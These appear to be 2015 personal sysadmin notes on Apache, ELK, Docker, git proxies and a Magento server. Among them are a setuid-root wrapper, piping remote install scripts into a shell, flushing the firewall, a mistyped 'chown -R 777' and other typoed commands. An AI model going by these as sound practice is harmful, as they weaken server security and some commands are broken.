iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to 8080

setuid wrapper program

httpdctrl.c

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <signal.h>
#include <strings.h>

// allow start/stop/restart of apache by non-root users

int main(int argc, char **argv)
{
  char *cmd, *cmd2, *usage;

  // UPDATE THIS LINE:
  cmd = "/your/path/to/httpd/sbin/apachectl";
  cmd2 = "apachectl";
  usage = "Usage: COMMAND [start|stop|restart]\n";

  if ( argc != 2 ) {
    printf(usage);
    exit(1);
  }

  setegid(0);
  seteuid(0);
  setgid(0);
  setuid(0);

  if ( strncmp(argv[1], "start", 5) == 0 ) {
    if (execl(cmd, cmd2, "start", (char*)0) < 0) {
     perror("Error");
    }
  } else if ( strncmp(argv[1], "stop", 4) == 0 ) {
    if (execl(cmd, cmd2, "stop", (char*)0) < 0) {
     perror("Error");
    }
  } else if ( strncmp(argv[1], "restart", 7) == 0 ) {
    if (execl(cmd, cmd2, "restart", (char*)0) < 0) {
     perror("Error");
    }
  } else {
    printf(usage);
    exit(1);
  }
  exit(0);
}

1
2
3

gcc -o httpdctrl httpdctrl.c
sudo chown root:root httpdctrl
sudo chmod u+s httpdctrl

Run on docker, lxc, runC

docker pull apache

If you only need super-basic stuff on a non-priv port, you could run:

python -m SimpleHTTPServer 8000

Reference

http://stackoverflow.com/questions/525672/is-there-a-way-to-start-restart-stop-apache-server-on-linux-as-non-root-user
http://askubuntu.com/questions/694036/apache-as-non-root
http://serverfault.com/questions/69847/linux-how-to-give-a-user-permission-to-restart-apache
http://www.debian-administration.org/article/386/Running_network_services_as_a_non-root_user

2015-12-11

2015-12-11

Do Something With ElasticSearch

elasticsearch.yml (node01, node02)

network.host: $xx
http.port: 9200
transport.tcp.port: 9300
index.number_of_replicas: 1
discovery:
  zen:
    ping:
      multicast.enabled: false
      unicast.hosts: ["$yy"]
      timeout: "3s"
cluster:
  name: es-cluster
node:
  name: $zz
path.repo: ["/mount/backups"]

index.search.slowlog.threshold.query.warn: 10s
index.search.slowlog.threshold.query.info: 5s
index.search.slowlog.threshold.query.debug: 2s
index.search.slowlog.threshold.query.trace: 500ms

index.search.slowlog.threshold.fetch.warn: 1s
index.search.slowlog.threshold.fetch.info: 800ms
index.search.slowlog.threshold.fetch.debug: 500ms
index.search.slowlog.threshold.fetch.trace: 200ms

index.indexing.slowlog.threshold.index.warn: 10s
index.indexing.slowlog.threshold.index.info: 5s
index.indexing.slowlog.threshold.index.debug: 2s
index.indexing.slowlog.threshold.index.trace: 500ms

replace vairable in node01 with ($xx=node01, $yy=node2, $zz=es-node01)
replace vairable in node02 with ($xx=node02, $yy=node1, $zz=es-node02)

docker-compose.yml

elasticsearch:
  build: elasticsearch/
  net: "host"
  volumes:
    - ./elasticsearch/config:/opt/elasticsearch/config:ro
    - /var/data:/opt/elasticsearch/data
    - /opt/backups/es_backup:/mount/backups
  expose:
    - "9200"
    - "9300"

Install/Configure NFS server and client

In node02 add NFS server

sudo apt-get install nfs-kernel-server
vi /etc/exports to add below setting
/opt/backups/es_backup node01(rw,sync,no_subtree_check)
then run exportfs -ra

In node01 add NFS client

1
2
3

sudo apt-get install nfs-common
midir -p /opt/backups/es_backup
mount node02:/opt/backups/es_backup es_backup

vi /etc/fstab to add below setting
10.13.135.38:/opt/backups/es_backup /opt/backups/es_backup nfs rw,hard,intr 0 0

Restart docker

Run command docker-compose up -d to build and run ES.

Create snapshot in ES with sense

PUT _snapshot/logstash_repo
{
    "type": "fs",
    "settings": {
      "compress": "true",
      "location": "/mount/backups/logstash_repo",
      "max_snapshot_bytes_per_sec" : "50mb",
      "max_restore_bytes_per_sec" : "50mb"
    }
}

Backup/Restore indices

PUT _snapshot/logstash_repo/snapshot_20151211
{
  "indices": "logstash-2015.12.10,logstash-2015.12.11",
  "ignore_unavailable": "true",
  "include_global_state": "false"
}

GET /_snapshot/logstash_repo/_all or GET /_snapshot/logstash_repo/snapshot_20151211/_status (Check)

DELETE logstash-2015.12.10,logstash-2015.12.11 (Delete Indice)

POST /_snapshot/logstash_repo/snapshot_20151211/_restore?wait_for_completion (Restore)

DELETE /_snapshot/logstash_repo (Delete Snapshot)

Following command should be remembered

GET _cluster/health
  or GET _cluster/health?level=indices
  or GET _cluster/health?level=shards
  or GET _cluster/health?wait_for_status=green

GET _cat/indices

GET logstash-2015.12.09/_settings

GET logstash-2015.12.09/_count

GET logstash-2015.12.09/_mapping

GET logstash-2015.12.16/server-SystemOut/_search?q=message:Exception

GET logstash-2015.12.08/server-SystemOut/_search
{
  "query": {
    "match": {
      "message": "Exception"
    }
  }
}

GET logstash-2015.12.15/_search?fields=timestamp,host
{
  "query": {
    "filtered": {
      "query": {
        "match": {
          "message": "Exception"
        }
      },
      "filter": {
        "range": {
          "@timestamp": {
            "gte": 1450212195957,
            "lte": 1450265395957,
            "format": "epoch_millis"
          }
        }
      }
    }
  },
  "sort": [
    {
      "@timestamp": {
        "order": "asc",
        "unmapped_type": "boolean"
      }
    }
  ],
  "size": 10,
  "from": 0,
  "fields": ["host","message"]
}

GET logstash-2015.12.15/_search?size=20&fields=message
{
  "query": {
    "query_string": {
      "query": "message : Exception AND type : moon01"
    }
  }
}

Client API to search ES cluster

package dh;

import io.searchbox.client.JestClient;
import io.searchbox.client.JestClientFactory;
import io.searchbox.client.config.HttpClientConfig;
import io.searchbox.core.Search;
import io.searchbox.core.SearchResult;

import java.io.IOException;
import java.util.Calendar;
import java.util.List;

import org.elasticsearch.index.query.QueryBuilder;
import org.elasticsearch.index.query.QueryBuilders;
import org.elasticsearch.search.builder.SearchSourceBuilder;

public class Main {
	public static void main(String[] args) throws IOException {
		JestClientFactory factory = new JestClientFactory();
		factory.setHttpClientConfig(new HttpClientConfig.Builder("http://10.13.135.37:9200").build());
		JestClient client = factory.getObject();

		SearchSourceBuilder builder = new SearchSourceBuilder();

		// single and mutilple criteria 
		QueryBuilder q1 = QueryBuilders.queryStringQuery("message : Exception AND type : moon01");
		QueryBuilder q2 = QueryBuilders.matchQuery("message", "Exception");

		long now = System.currentTimeMillis();
		Calendar c = Calendar.getInstance();
		c.set(Calendar.DAY_OF_MONTH, c.get(Calendar.DAY_OF_MONTH) - 3);
		long thatDay = c.getTimeInMillis();

		String filtered = builder.query(
				QueryBuilders.filteredQuery(QueryBuilders.queryFilter(q2), QueryBuilders.rangeQuery("@timestamp").from(
						Long.toString(thatDay)).to(Long.toString(now)).format("epoch_millis"))).sort("@timestamp")
				.size(200).from(0).field("_source").toString();

		System.out.println("DSL Query " + filtered);

		Search search = ((Search.Builder) new Search.Builder(filtered).addIndex("logstash-2015.12.15").addIndex(
				"logstash-2015.12.16")).build();
		SearchResult result = (SearchResult) client.execute(search);

		List<SearchResult.Hit<Log, Void>> hits = result.getHits(Log.class);

		int i = 0;
		for (SearchResult.Hit<Log, Void> hit : hits) {
			i++;
			if (hit.source.getWas_message() != null && hit.source.getWas_message().length() > 200) {
				System.out.println(i + " " + hit.index + ", " + hit.source.getType() + ", "
						+ hit.source.getWas_message().substring(0, 200));
			} else {
				System.out.println(i + " " + hit.index + ", " + hit.source.getType() + ", "
						+ hit.source.getWas_message());
			}
		}
		System.out.println("Total: " + result.getTotal() + ", Hits size: " + hits.size());
	}
}

class Log {
	private String type;
	private String was_message;

	public String getType() {
		return type;
	}

	public void setType(String type) {
		this.type = type;
	}

	public String getWas_message() {
		return was_message;
	}

	public void setWas_message(String was_message) {
		this.was_message = was_message;
	}

}

Software installed in server

fun:
  cowsay
  fortune
  sl
  jq
  banner
  toilet
  figlet
  libaa-bin

utility:
  htop
  python-pip
  atop
  sysstat

pip:
  paramiko
  fabric
  elasticsearch

nfs:
  nfs-common
  nfs-kernel-server

Monitor docker with following technology

Rsyslog
ElasticSearch + Logstash + Kibana
Graphite
Collectd
grafana/grafana
tutum/influxdb
google/cadvisor
Heka
flunted

Reference

https://help.ubuntu.com/community/SettingUpNFSHowTo

2015-11-17

2015-11-17

ELK-install-in-AIX-and-Windows

Requirements
- Basic
  - jdk-8u65-windows-x64
  - Cygwin
- ELK
  - elasticsearch-2.0.0
  - logstash-2.0.0
  - kibana-4.2.0-windows
  - logstash-forwarder-java-0.2.3
  - Redis-x64-2.8.2104.msi
  - marvel
    - marvel-2.0.0
    - marvel-agent-2.0.0
    - license-2.0.0
- tmux
  - tmux-2.1
  - ncurses-6.0
  - libevent-2.0.22-stable
Run in AIX
Download logstash-forwarder-java from
https://github.com/didfet/logstash-forwarder-java/releases/download/0.2.3/logstash-forwarder-java-0.2.3-bin.zip

logstash.json

{
  "network": {
    "servers": [ "webserver:5043" ],
    "ssl certificate": "./lumberjack.crt",
    "ssl key": "./lumberjack.key",
    "ssl ca": "./keystore.jks",
    "timeout": 15
  },

  "files": [
    {
      "paths": [
        "/usr/IBM/WebSphere/AppServer/profiles/node/logs/node01/SystemOut.log"
      ],
      "fields": { "type": "server-SystemOut" }
    }
  ]
}

Generate key of lumberjack

1
2

openssl req -x509 -days 3650 -batch -nodes -newkey rsa:2048 -keyout lumberjack.key -out lumberjack.crt -subj /CN=webserver
/usr/java6/bin/keytool -importcert -trustcacerts -file lumberjack.crt -alias ca -keystore keystore.jks

Run the program

1	nohup /usr/java6/bin/java -jar logstash-forwarder-java-0.2.3.jar -config logstash.json -logfile logstash.log 2>&1 &

Run in Cygwin
Install license and marvel-agent in elasticsearch
bin/plugin.bat install file:///c:/Users/support/ELK/Software/license-2.0.0.zip
bin/plugin.bat install file:///c:/Users/support/ELK/Software/marvel-agent-2.0.0.zip
Install marvel in kibana (https://www.elastic.co/guide/en/marvel/current/installing-marvel.html)
bin/kibana.bat plugin --install marvel --url file://c:/Users/support/ELK/Software/marvel-2.0.0.tar.gz
bin/kibana.bat plugin --install sense --url file://c:/Users/support/ELK/Software/sense-2.0.0-beta1.tar.gz
Install tmux
Install libevent-2.0.22-stable and ncurses-6.0 and tmux-2.1
Configure logstash

logstash-shipper.conf

input {
  lumberjack {
    port => 5043
    type => "logs"
    ssl_certificate => "server/lumberjack.crt"
    ssl_key => "server/lumberjack.key"

    codec => multiline {
     # pattern => "(^.+Exception: .+)|(^\s+at .+)|(^\s+... \d+ more)|(^\s*Caused by:.+)"
      pattern => "(^[a-zA-Z.]+(?:Error|Exception): .+)|(^\s+at .+)|(^\s+... \d+ more)|(^\s*Caused by:.+)"
      negate => false
      what => "previous"
    }
  }
}

filter {
   grok {
      match => [ "message", "\[(?<timestamp>%{DATE_US}\s+%{HOUR}:%{MINUTE}:%{SECOND})\s+(?<tz>%{WORD})\]\s+%{GREEDYDATA:was_message}"]
   }

   date {
      match => [ "timestamp" , "MM/dd/YY HH:mm:ss:SSS" ]
      target => "@timestamp"
      timezone => "Asia/Hong_Kong"
   }

   mutate {
     gsub => ['message', "\n", " "]
     gsub => ['message', "\t", " "]
   }
}

output {
  #stdout { codec => "rubydebug" }

  redis {
    host => "localhost"
    data_type => "list"
    key => "logstash"
    congestion_interval => 1
    congestion_threshold => 20000000
    workers => 16
    # Batch processing requires redis >= 2.4.0
    batch => true
    batch_events => 50
    batch_timeout => 5
  }
}

logstash-indexer.conf

input {
  redis {
    host => "localhost"
    data_type => "list"
    key => "logstash"
    threads => 2
    batch_count => 1000
  }
}

output {
  elasticsearch {
    hosts => ["127.0.0.1"]
    manage_template => true
    workers => 1
    flush_size => 2000
    idle_flush_time => 5
    index => "logstash-%{+YYYY.MM.dd}"
  }
}

Start logstash, elasticsearch, kibana

$ tmux
$ ./elasticsearch.bat (ctrl + b + %)
$ ./logstash.bat -f server/logstash-shipper.conf (ctrl + b + ")
$ ./logstash.bat -f server/logstash-indexer.conf (ctrl + b + ")
$ ./kibana.bat (ctrl + b + %)

Reference
http://michael.bouvy.net/blog/en/2013/11/19/collect-visualize-your-logs-logstash-elasticsearch-redis-kibana/
http://technologyconversations.com/2015/05/18/centralized-system-and-docker-logging-with-elk-stack/
http://nathanleclaire.com/blog/2015/04/27/automating-docker-logging-elasticsearch-logstash-kibana-and-logspout/
https://www.korekontrol.eu/blog/tips-for-centralized-logging-infrastructure-with-logstash
http://www.vmdoh.com/blog/centralizing-logs-lumberjack-logstash-and-elasticsearch
http://www.linux-magazine.com/Online/Features/Consolidating-Logs-with-Logstash
https://ianunruh.com/2014/05/monitor-everything-part-2.html
https://linuxfestnorthwest.org/sites/default/files/slides/Log%20Analysis%20with%20the%20ELK%20Stack.pdf
http://elekslabs.com/2014/05/centralized-logging-solutions-overview.html
https://programmaticponderings.wordpress.com/2015/08/02/log-aggregation-visualization-and-analysis-of-microservices-using-elk-stack-and-logspout/

2015-10-16

2015-10-16

curl and wget

Usage of curl and wget

curl -sSL -X post --data "keyword=xx" -k -u dhuser:dhpass -x proxyserver:8080 http://abc.com

export http_proxy=proxyserver:8080
wget --no-check-certificate https://dhuser:dhpass@abc.com/logs

2015-10-09

2015-10-09

git clone ssh behind proxy windows

Git protocal

1
2
3

git://
https://
ssh://

Create repository

git init --bare

Clone repository

git clone user@remote-server:/home/git/repo.git

Clone repository behind a firewall proxy

Edit ~/.ssh/config, add following command to it

1 2	ProxyCommand C:/connect-1.104-win32-msvc/connect.exe -H proxyserver:8080 %h %p IdentityFile "C:/Users/user/Desktop/id_rsa"

Open cygwin, run git clone command above to retrieve repository.

Clone repository by git protocal

Install socat, then create a file named gitproxy, its content as below,
$ sudo vi /usr/bin/gitproxy

#!/bin/bash

PROXY=squid.vpsee.com
PROXYPORT=3128
PROXYAUTH=username:password
exec socat STDIO PROXY:$PROXY:$1:$2,proxyport=$PROXYPORT,proxyauth=$PROXYAUTH

$ git config --global core.gitproxy gitproxy

Clone repository
git clone git://user@remote-server:/home/git/repo.git

http://cms-sw.github.io/tutorial-proxy.html
http://www.vpsee.com/2011/07/how-to-use-git-through-a-http-proxy/
http://www.laurii.info/2013/04/git-ssh-behind-proxy-windows/
http://stackoverflow.com/questions/3248779/which-is-faster-ssh-or-git-protocol

2015-10-07

2015-10-07

Install Docker on CentOS 6

Update OS

yum update -y

Upgrade kernel 3.10

Check kernel version

uname -r => 2.6.32-279.el6.x86_64

Import ELRepo public keys

1 2	rpm --import https://www.elrepo.org/RPM-GPG-KEY-elrepo.org rpm -Uvh http://www.elrepo.org/elrepo-release-6-6.el6.elrepo.noarch.rpm

Install kernel

yum --enablerepo=elrepo-kernel install kernel-lt
uname -r => 3.10.90-1.el6.elrepo.x86_64

Configure grub

Change the kernel boot order at /etc/grub.conf, change default from 1 to 0 as below,

default=0
timeout=5
splashimage=(hd0,0)/grub/splash.xpm.gz
hiddenmenu
title CentOS (3.10.90-1.el6.elrepo.x86_64)
        root (hd0,0)
        kernel /vmlinuz-3.10.90-1.el6.elrepo.x86_64 ro root=/dev/mapper/VolGroup-lv_root rd_NO_LUKS LANG=en_US.UTF-8 rd_NO_MD console=hvc0  KEYTABLE=us rd_LVM_LV=VolGroup/lv_swap SYSFONT=latarcyrheb-sun16 crashkernel=auto rd_LVM_LV=VolGroup/lv_root rd_NO_DM rhgb quiet
        initrd /initramfs-3.10.90-1.el6.elrepo.x86_64.img
title CentOS (2.6.32-573.7.1.el6.x86_64)
        root (hd0,0)
        kernel /vmlinuz-2.6.32-573.7.1.el6.x86_64 ro root=/dev/mapper/VolGroup-lv_root rd_NO_LUKS LANG=en_US.UTF-8 rd_NO_MD console=hvc0  KEYTABLE=us rd_LVM_LV=VolGroup/lv_swap SYSFONT=latarcyrheb-sun16 crashkernel=auto rd_LVM_LV=VolGroup/lv_root rd_NO_DM rhgb quiet
        initrd /initramfs-2.6.32-573.7.1.el6.x86_64.img
title CentOS (2.6.32-279.el6.x86_64)
        root (hd0,0)
        kernel /vmlinuz-2.6.32-279.el6.x86_64 ro root=/dev/mapper/VolGroup-lv_root rd_NO_LUKS LANG=en_US.UTF-8 rd_NO_MD console=hvc0  KEYTABLE=us rd_LVM_LV=VolGroup/lv_swap SYSFONT=latarcyrheb-sun16 crashkernel=auto rd_LVM_LV=VolGroup/lv_root rd_NO_DM rhgb quiet
        initrd /initramfs-2.6.32-279.el6.x86_64.img

Check kernel configuration as a suitable docker host

wget https://raw.githubusercontent.com/docker/docker/master/contrib/check-config.sh

./check-config.sh
warning: /proc/config.gz does not exist, searching other paths for kernel config ...
info: reading kernel config from /boot/config-3.10.90-1.el6.elrepo.x86_64 ...

Generally Necessary:
- cgroup hierarchy: properly mounted [/cgroup]
- CONFIG_NAMESPACES: enabled
- CONFIG_NET_NS: enabled
- CONFIG_PID_NS: enabled
- CONFIG_IPC_NS: enabled
- CONFIG_UTS_NS: enabled
- CONFIG_DEVPTS_MULTIPLE_INSTANCES: enabled
- CONFIG_CGROUPS: enabled
- CONFIG_CGROUP_CPUACCT: enabled
- CONFIG_CGROUP_DEVICE: enabled
- CONFIG_CGROUP_FREEZER: enabled
- CONFIG_CGROUP_SCHED: enabled
- CONFIG_CPUSETS: enabled
- CONFIG_MEMCG: enabled
- CONFIG_MACVLAN: enabled (as module)
- CONFIG_VETH: enabled (as module)
- CONFIG_BRIDGE: enabled (as module)
- CONFIG_BRIDGE_NETFILTER: enabled
- CONFIG_NF_NAT_IPV4: enabled (as module)
- CONFIG_IP_NF_FILTER: enabled (as module)
- CONFIG_IP_NF_TARGET_MASQUERADE: enabled (as module)
- CONFIG_NETFILTER_XT_MATCH_ADDRTYPE: enabled (as module)
- CONFIG_NETFILTER_XT_MATCH_CONNTRACK: enabled (as module)
- CONFIG_NF_NAT: enabled (as module)
- CONFIG_NF_NAT_NEEDED: enabled
- CONFIG_POSIX_MQUEUE: enabled

Optional Features:
- CONFIG_MEMCG_KMEM: enabled
- CONFIG_MEMCG_SWAP: enabled
- CONFIG_MEMCG_SWAP_ENABLED: missing
    (note that cgroup swap accounting is not enabled in your kernel config, you can enable it by setting boot option "swapaccount=1")
- CONFIG_RESOURCE_COUNTERS: enabled
- CONFIG_BLK_CGROUP: enabled
- CONFIG_IOSCHED_CFQ: enabled
- CONFIG_BLK_DEV_THROTTLING: enabled
- CONFIG_CGROUP_PERF: enabled
- CONFIG_CGROUP_HUGETLB: missing
- CONFIG_NET_CLS_CGROUP: enabled
- CONFIG_NETPRIO_CGROUP: enabled (as module)
- CONFIG_CFS_BANDWIDTH: enabled
- CONFIG_FAIR_GROUP_SCHED: enabled
- CONFIG_RT_GROUP_SCHED: enabled
- CONFIG_EXT3_FS: enabled (as module)
- CONFIG_EXT3_FS_XATTR: enabled
- CONFIG_EXT3_FS_POSIX_ACL: enabled
- CONFIG_EXT3_FS_SECURITY: enabled
- CONFIG_EXT4_FS: enabled (as module)
- CONFIG_EXT4_FS_POSIX_ACL: enabled
- CONFIG_EXT4_FS_SECURITY: enabled
- Storage Drivers:
  - "aufs":
    - CONFIG_AUFS_FS: missing
  - "btrfs":
    - CONFIG_BTRFS_FS: enabled (as module)
  - "devicemapper":
    - CONFIG_BLK_DEV_DM: enabled (as module)
    - CONFIG_DM_THIN_PROVISIONING: enabled (as module)
  - "overlay":
    - CONFIG_OVERLAY_FS: missing
  - "zfs":
    - /dev/zfs: missing
    - zfs command: missing
    - zpool command: missing

Install Docker

Install epel repository

rpm -iUvh http://dl.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm

Update packages

yum update -y

Install Docker

yum install docker-io

Start docker daemon

service docker start

Configure docker to start when os boots

chkconfig docker on

Test docker

docker pull busybox
docker pull centos

docker run -i -t busybox /bin/sh
docker run -i -t centos /bin/bash

Install docker-compose

1	curl -L https://github.com/docker/compose/releases/download/1.4.2/docker-compose-`uname -s`-`uname -m` > /usr/local/bin/docker-compose

Test docker-compose from https://docs.docker.com/compose/

Reference

Install Kernel 3.10 on CentOS 6.5
阿里云的Centos 6.5 模板上使用Docker
http://elrepo.org/tiki/tiki-index.php
kernel-lt
How To Install Docker on CentOS 6

2015-10-02

2015-10-02

Fun with Spring Cloud and microservice

Excellent Blog
- Must read
  Blog Series - Building Microservices
  Building Microservices with Spring Cloud and Docker
- Spring
  Microservice Registration and Discovery with Spring Cloud and Netflix’s Eureka
  Microservices with Spring
  Learning Spring-Cloud - Writing a Microservice
  Spring Boot with Docker
  12factor app
GitHub
spring-cloud-samples
spring-cloud

Install docker

1
2
3

export http_proxy=http://192.168.56.1:21
curl -x 192.168.56.1:21 -sSL https://get.docker.com/gpg | sudo apt-key add -
curl -x 192.168.56.1:21 -sSL https://get.docker.com/ | sh

Clone spring project

1	git clone https://github.com/kbastani/spring-cloud-microservice-example --config "http.proxy=http://192.168.56.1:21"

cd spring-cloud-microservice-example/

Install docker-compose

1	curl -x http://192.168.56.1:21 -L https://github.com/docker/compose/releases/download/1.4.0/docker-compose-`uname -s`-`uname -m` > /usr/local/bin/docker-compose

Install Maven
wget http://apache.communilink.net//maven/maven-3/3.3.3/binaries/apache-maven-3.3.3-bin.tar.gz
set proxy and repository path (shared by user and root) in conf/settings.xml
Install Gradle
gradle -Dhttp.proxyHost=192.168.56.1 -Dhttp.proxyPort=21 -Dhttps.proxyHost=192.168.56.1 -Dhttps.proxyPort=21 build

Install Java (Refer to http://www.tecmint.com/install-java-jdk-jre-in-linux/ or http://tecadmin.net/install-java-8-on-centos-rhel-and-fedora/)
Download jdk-8u60-linux-x64.gz

sudo update-alternatives --install /usr/bin/java java /home/user/Software/jdk1.8.0_60/bin/java 3
sudo update-alternatives --install /usr/bin/javac javac /home/user/Software/jdk1.8.0_60/bin/javac 3
sudo update-alternatives --set jar /home/user/Software/jdk1.8.0_60/bin/jar
sudo update-alternatives --set javac /home/user/Software/jdk1.8.0_60/bin/javac

Setup docker proxy
edit /etc/default/docker to set proxy (/etc/sysconfig/docker in CentOS)
service docker restart
or
1
2
sudo HTTP_PROXY=http://192.168.56.1:21/ docker -d &
sudo usermod -aG docker username

Installed software and component

rover-master (https://github.com/lecram/rover)
otp_src_18.0 (Erlang)
rabbitmq_server-3.5.4
spring-cloud
- https://github.com/callistaenterprise/blog-microservices.git
- https://github.com/bijukunjummen/spring-cloud-ping-pong-sample
- https://github.com/joshlong/service-registration-and-discovery
- https://github.com/paulc4/microservices-demo
- https://github.com/kbastani/spring-cloud-microservice-example
- https://github.com/spring-guides/gs-spring-boot-docker.git
elinks-0.12-20150916
Python-2.7.3
ranger-1.7.1
torrent
- transmission-2.84
- libevent-2.0.22-stable
- curl-7.44.0
- intltool-0.51.0
tmux-2.0
ncurses-6.0
apache-maven-3.3.3
git-1.8.5.4
phpredis
redis-2.8.21
ffmpeg_sources
- ffmpeg (git clone)
- x264 (git clone)
- libvorbis-1.3.4 (libvorbis-1.3.4.tar.gz)
- lame-3.99.5 (lame-3.99.5.tar.gz)
- libvpx (git clone)
- libogg-1.3.0 (libogg-1.3.0.tar.gz)
- yasm-1.2.0 (yasm-1.2.0.tar.gz)
- yasm (git clone)
- xvidcore (git clone)
shadowsocks-libev (https://github.com/shadowsocks/shadowsocks-libev.git)
jdk1.8.0_60
magento-sample-data-1.9.1.0
youtube-dl (https://rg3.github.io/youtube-dl/)
jq (https://stedolan.github.io/jq/)

2015-10-02

2015-10-02

node_module config

node_module

Config

npm
“C:/program file/node/node_module”
cache
“C://Users//HPUser//AppData//Roaming//npm-cache”
/home/xx/.npm
prefix
“C://Users//HPUser//AppData//Roaming//npm”
“/usr/local”
userconfig
“C://Users//HPUser//.npmrc”
“/home/xx/.npmrc”
globalconfig
“C://Users//HPUser//AppData//Roaming//npm//etc//npmrc”
“/usr/local/etc/npmrc”
tmp
“C://Users//HPUser//AppData//Local//Temp”
“/home/xx/tmp”

Show config list

1 2	npm config list npm config get prefix / set prefix

2015-09-09

2015-09-09

What stuff has done with Magento

http://devdocs.magento.com/guides/m1x/index.html
http://devdocs.magento.com/guides/m1x/install/installing_install.html
http://merch.docs.magento.com/ce/user_guide/Magento_Community_Edition_User_Guide.html

Upgrade system

useradd user

yum update
yum clean
yum install yum-utils
yum-complete-transaction

yum install php php-mysql
yum install httpd
yum install mysql-server
service mysqld start
mysql_secure_installation

Fix php5.1 upgrade to php5.4w

rpm -Uvh http://mirror.webtatic.com/yum/el5/latest.rpm
yum remove php php-mysql
yum install yum-plugin-replace
yum replace php-common --replace-with=php54w-common
yum install php54w

yum install php54w-mcrypt
yum install php54w-gd
yum install php54w-soap
yum install php54w-mbstring
yum install php54w-devel # for phpredis extension

disable iptables

iptables -F
http://wiki.centos.org/HowTos/Network/IPTables

cat /etc/sysconfig/iptables | see the rules

iptables -A INPUT -p tcp -m state --state NEW -m tcp --dport 21 -j ACCEPT
iptables -A INPUT -p tcp -m state --state NEW -m tcp --dport 20 -j ACCEPT

iptables -A INPUT -j RH-Firewall-1-INPUT
iptables -A FORWARD -j RH-Firewall-1-INPUT
iptables -A RH-Firewall-1-INPUT -i lo -j ACCEPT
iptables -A RH-Firewall-1-INPUT -p icmp --icmp-type any -j ACCEPT
iptables -A RH-Firewall-1-INPUT -p 50 -j ACCEPT
iptables -A RH-Firewall-1-INPUT -p 51 -j ACCEPT
iptables -A RH-Firewall-1-INPUT -p udp --dport 5353 -d 224.0.0.251 -j ACCEPT
iptables -A RH-Firewall-1-INPUT -p udp -m udp --dport 631 -j ACCEPT
iptables -A RH-Firewall-1-INPUT -p tcp -m tcp --dport 631 -j ACCEPT
iptables -A RH-Firewall-1-INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 22 -j ACCEPT
iptables -A RH-Firewall-1-INPUT -j REJECT --reject-with icmp-host-prohibited

/*modprobe ip_conntrack_ftp
iptables -I INPUT  -p tcp -m tcp --dport 21 -m conntrack --ctstate ESTABLISHED -j ACCEPT -m comment --comment "Allow ftp connections on port 21"
iptables -I OUTPUT -p tcp -m tcp --dport 21 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT -m comment --comment "Allow ftp connections on port 21"

iptables -I INPUT  -p tcp -m tcp --dport 20 -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT -m comment --comment "Allow ftp connections on port 20"
iptables -I OUTPUT -p tcp -m tcp --dport 20 -m conntrack --ctstate ESTABLISHED -j ACCEPT -m comment --comment "Allow ftp connections on port 20"
*/

iptables -I INPUT -m state --state NEW,ESTABLISHED -m tcp -p tcp --dport 80 -j ACCEPT
iptables -I INPUT -m state --state NEW,ESTABLISHED -m tcp -p tcp --dport 20022:20023 -j ACCEPT

service iptables save

Settings

1
2
3

chown -R 777 magento/media
php_value memory_limit 512M in .htaccess
upload_max_filesize = 100M /etc/php.ini

Fix problem (PHP Fatal error: Unknown: Failed opening required ‘/var/www/html/magento/index.php’ (include_path=’.:/usr/share/pear:/usr/share/php’) in Unknown on line 0)
sudo /sbin/restorecon -R /var/www/html/magento/

Install git

yum -y install zlib-devel openssl-devel cpio expat-devel gettext-devel gcc
wget https://www.kernel.org/pub/software/scm/git/git-1.8.5.4.tar.gz
make configure
./configure --with-expat --with-openssl --with-curl
make && make install

Upgrade mysql

yum remove mysql-*
yum remove libmysqlclient15-5.0.95-5.w5.x86_64

download mysql-community-release-el5-{version-number}.noarch.rpm from http://dev.mysql.com/doc/mysql-repo-excerpt/5.6/en/linux-installation-yum-repo.html
rpm -Uvh mysql-community-release-el5-5.noarch.rpm
yum install mysql-community-server
yum install -y dovecot
yum install -y perl-DBD-MySQL
yum install -y php54w-mysql

Remove index.php in url
in /etc/conf/httpd.conf, in section <Directory "/var/www/html">, change AllowOverride None to AllowOverride All
edit magento/.htaccess and uncomment the line: RewriteBase /magento/
in admin console,
In System->Configuration->Web->Search Engines Optimizations, select Yes
In System->Configuration->Web->Secure->Use Secure Urls in the fontend, select Yes
Admin console settings
System->Configuration->System->Advanced->Advanced->Disable Modules Output
System->Configuration->System->Advanced->Developer->Log Settings
set Mage::setIsDeveloperMode(true); and ini_set(‘display_errors’, 1); in file index.php
System->Cache Management
System->Index Management
Access control to catogeroy
System->Category->Customer Groups Access Control http://www.zetaprints.com/magentohelp/magento-access-control-for-dynamic-imaging/
Install extenstion
System->Magento Connect
Install phpMyAdmin
cd /var/www/html && mv phpMyAdmin pma
Product video link
http://de.magentocommerce.com/magento-connect/product-videos-2.html
http://www.magentocommerce.com/magento-connect/product-video-1.html
http://www.magentocommerce.com/magento-connect/product-video-4.html
Installed http://www.magentocommerce.com/magento-connect/youtube-video-gallery-1.html
Disable Mage_Notification module to off the noti of callout
Set logo
System->Configuration->General->design->Logo Image Src

Change color
Install ruby and rubygems and compass

curl -sSL https://get.rvm.io | bash
srouce /etc/profile.d/rvm.sh
rvm install 1.9.3
rvm use 1.9.3 --default
gem install compass
Change color => compass watch . && edit skin/frontend/rwd/default/scss/_var.scss

Log all sql
Edit lib/Varien/Db/Adapter/Pdo/Mysql.php, on these $_debug $_logAllQueries, refer to how-to-log-all-magento-sql

Install Redis

wget https://github.com/antirez/redis/archive/2.8.21.tar.gz
tar zxf redis-2.8.21.tar.gz
make && sudo make install
cd utils
./install_server.sh # the last answer is "/usr/local/bin/redis-server"
sudo chkconfig redis_6379 on
sudo service redis_6379 start

Install phpRedisAdmin

1
2
3

git clone git://github.com/ErikDubbelboer/phpRedisAdmin.git
cd phpRedisAdmin
git clone https://github.com/nrk/predis.git vendor

Install Cm_RedisSession
enable Cm_RedisSession module
/app/etc/modules/Cm_RedisSession.xml active -> true
rm -rf var/cache
System > Cache Management, Flush Magento Cache
update app/etc/local.xml
Install Cm_Cache_Backend_Redis && phpredis && modman
- phpredis
  1
  2
  3
  4
  git clone https://github.com/phpredis/phpredis
  phpize
  ./configure [--enable-redis-igbinary]
  make && make install
  add extension=redis.so in /etc/php.d/redis.ini
  add config of redis cache in app/etc/local.xml
- Install modman from https://github.com/colinmollenhour/modman

